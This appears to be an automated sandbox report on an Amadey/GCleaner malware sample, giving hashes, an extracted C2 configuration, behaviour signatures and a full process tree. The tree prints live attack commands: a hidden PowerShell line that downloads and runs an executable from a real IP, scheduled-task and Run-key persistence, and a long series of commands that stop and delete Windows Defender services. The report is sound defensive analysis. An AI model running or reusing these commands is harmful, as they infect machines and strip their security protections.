Analysis

  • max time kernel
    62s
  • max time network
    96s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/03/2025, 18:34

General

  • Target

    f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe

  • Size

    938KB

  • MD5

    5ec95a42b16d80c72d17cc6d0bac58de

  • SHA1

    9cfd9221606e1acfef1ea5f6f4bf88080822d5db

  • SHA256

    f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b

  • SHA512

    ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b

  • SSDEEP

    24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 11 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 21 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
    "C:\Users\Admin\AppData\Local\Temp\f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn hkkZbmauZK3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\K2GC9cBIz.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn hkkZbmauZK3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\K2GC9cBIz.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2300
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\K2GC9cBIz.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FTQ5Y2IRWFL0ED01RBCCNCGLKYG0MC78.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2320
        • C:\Users\Admin\AppData\Local\TempFTQ5Y2IRWFL0ED01RBCCNCGLKYG0MC78.EXE
          "C:\Users\Admin\AppData\Local\TempFTQ5Y2IRWFL0ED01RBCCNCGLKYG0MC78.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2108
            • C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
              "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2980 -s 36
                7⤵
                • Loads dropped DLL
                PID:1100
            • C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe
              "C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1868
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1868 -s 36
                7⤵
                • Loads dropped DLL
                PID:2232
            • C:\Users\Admin\AppData\Local\Temp\10351780101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10351780101\apple.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2528
              • C:\Users\Admin\AppData\Local\Temp\22.exe
                "C:\Users\Admin\AppData\Local\Temp\22.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2252
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4827.tmp\4828.tmp\4829.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:872
                  • C:\Users\Admin\AppData\Local\Temp\22.exe
                    "C:\Users\Admin\AppData\Local\Temp\22.exe" go
                    9⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of WriteProcessMemory
                    PID:1716
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4875.tmp\4876.tmp\4877.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:608
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:1036
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:2084
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:2088
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1504
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:2312
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:576
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:3012
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:2488
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:2532
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:284
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:1492
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:1824
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:3008
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:888
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:3036
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:1760
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:468
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:1300
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:1688
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:1696
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:1276
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                  PID:1600
                                • C:\Windows\system32\sc.exe
                                  sc stop "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1876
                                • C:\Windows\system32\sc.exe
                                  sc delete "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2400
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                  11⤵
                                    PID:2708
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2568
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2152
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                    11⤵
                                      PID:1040
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2116
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2668
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                      11⤵
                                        PID:2920
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2848
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2300
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                        11⤵
                                          PID:2828
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2852
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2664
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                          11⤵
                                            PID:2624
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2344
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2956
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                            11⤵
                                              PID:2680
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:304
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2600
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                              11⤵
                                                PID:2176
                                              • C:\Windows\system32\sc.exe
                                                sc stop "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2824
                                              • C:\Windows\system32\sc.exe
                                                sc delete "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2856
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                11⤵
                                                  PID:2584
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:108
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2892
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                  11⤵
                                                    PID:2612
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1484
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1792
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                    11⤵
                                                      PID:1436
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:860
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:2788
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                      11⤵
                                                        PID:2052
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                        11⤵
                                                          PID:2096
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                          11⤵
                                                            PID:2296
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                            11⤵
                                                              PID:2628
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                              11⤵
                                                                PID:3040
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:2248
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:348
                                                    • C:\Users\Admin\AppData\Local\Temp\10352530101\amnew.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10352530101\amnew.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:2776
                                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                        7⤵
                                                        • Downloads MZ/PE file
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies system certificate store
                                                        PID:2188
                                                        • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:1152
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 1152 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:2324
                                                        • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2708
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2708 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:2964
                                                        • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2028
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2028 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:1716
                                                        • C:\Users\Admin\AppData\Local\Temp\10041590101\crypted.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10041590101\crypted.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2988
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2988 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:1972
                                                        • C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1656
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"
                                                            9⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            PID:1036
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 6
                                                              10⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:2364
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"
                                                              10⤵
                                                                PID:2768
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd" /c ping 127.0.0.1 -n 16 > nul && copy "C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe" "C:\Users\Admin\AppData\Local\key.exe" && ping 127.0.0.1 -n 16 > nul && "C:\Users\Admin\AppData\Local\key.exe"
                                                              9⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:1952
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 16
                                                                10⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:1128
                                                          • C:\Users\Admin\AppData\Local\Temp\10041870101\0318173125.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10041870101\0318173125.exe"
                                                            8⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1744
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10041870101\0318173125.exe"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:1688
                                                      • C:\Users\Admin\AppData\Local\Temp\10352670101\2cd3f8b602.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352670101\2cd3f8b602.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1000
                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10352670101\2cd3f8b602.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3052
                                                      • C:\Users\Admin\AppData\Local\Temp\10352680101\0b89d01f90.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352680101\0b89d01f90.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:2236
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 2236 -s 64
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:1556
                                                      • C:\Users\Admin\AppData\Local\Temp\10352690101\7b35p_003.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352690101\7b35p_003.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2080
                                                      • C:\Users\Admin\AppData\Local\Temp\10352700101\EPTwCQd.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352700101\EPTwCQd.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:2528
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 2528 -s 36
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:548

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                              Filesize

                                              71KB

                                              MD5

                                              83142242e97b8953c386f988aa694e4a

                                              SHA1

                                              833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                              SHA256

                                              d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                              SHA512

                                              bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K\service[1].htm

                                              Filesize

                                              1B

                                              MD5

                                              cfcd208495d565ef66e7dff9f98764da

                                              SHA1

                                              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                              SHA256

                                              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                              SHA512

                                              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe

                                              Filesize

                                              1.2MB

                                              MD5

                                              646254853368d4931ced040b46e9d447

                                              SHA1

                                              c9e4333c6feb4f0aeedf072f3a293204b9e81e28

                                              SHA256

                                              5a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e

                                              SHA512

                                              485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819

                                            • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

                                              Filesize

                                              974KB

                                              MD5

                                              71256c11265d9762446983178290b1d2

                                              SHA1

                                              3578f76f0705950d07affe6f0fcdfcd5ec8c66c6

                                              SHA256

                                              8e5021734b22342186a7b51235fbccc3d72ca27aa940c5b5c5e876d9fd406a85

                                              SHA512

                                              aa9e8353c5eab9e18ced0f2aa6770ba39bd622bfa3d9e1581c84d6bbf6f9dd0d02cf1f750b003afe1037b9be2e71c0be5581a6e9c4dc83d9297aed5bad08c98b

                                            • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe

                                              Filesize

                                              1.1MB

                                              MD5

                                              3928c62b67fc0d7c1fb6bcce3b6a8d46

                                              SHA1

                                              e843b7b7524a46a273267a86e320c98bc09e6d44

                                              SHA256

                                              630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397

                                              SHA512

                                              1884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857

                                            • C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe

                                              Filesize

                                              381KB

                                              MD5

                                              6bb7c5fdc4cdd205b797a5ad7045a12a

                                              SHA1

                                              5fb227a2e7b0cc6c9851c3e9a5db6012ab5a790e

                                              SHA256

                                              baad0f118775a206bb4fa8e755efdd0ee209fda094900024d69cbd0f0f475934

                                              SHA512

                                              fc9bf002e3dc54d7604601995afed013ca2e1088886bcfbbcf93dc82ed3fe7e11ac6824766590dededd26a95c0e9cf70460348804ae1a7a8a5ad4141f05a4875

                                            • C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe

                                              Filesize

                                              1.4MB

                                              MD5

                                              f491669e68d007b4e5972b1e7eac66c5

                                              SHA1

                                              ab906a0a0ded0d7fba53782da980c17a89115994

                                              SHA256

                                              c659a51e346fd5a3531480ed65c7c9018c191c310e3cdddfbdbe75272d5e14a4

                                              SHA512

                                              02a67eaa2110b9a752b2a86a28cdf8f73f31e789cd1124acc2590d6f5f1336657a0888c58e3188835f2fe8e5218b2686f8ce185ecf940f38339ea99b6119b847

                                            • C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe

                                              Filesize

                                              1.2MB

                                              MD5

                                              30c3c4889a1866dd2e860a05f5a7526d

                                              SHA1

                                              99a89040909e8f2dc6e3dfbb705b57b1bb19bbca

                                              SHA256

                                              e5784048549a32579385a95d2c26104be9fd00d894c42563f6aadf06a15c0ace

                                              SHA512

                                              72bb88d7d5a0ac7e6847c5e11dc1071abba00a8e550b304794a31cc95543cd38da0f59d277aaab72ab8644e5a65a0b57cd75a33bee016355dca9a205e7bff90d

                                            • C:\Users\Admin\AppData\Local\Temp\10351780101\apple.exe

                                              Filesize

                                              327KB

                                              MD5

                                              2512e61742010114d70eec2999c77bb3

                                              SHA1

                                              3275e94feb3d3e8e48cf24907f858d6a63a1e485

                                              SHA256

                                              1dc8bf01c0df1ff9c85546e5304169e7f4b79712a63fbcb13cd577808d80b3fb

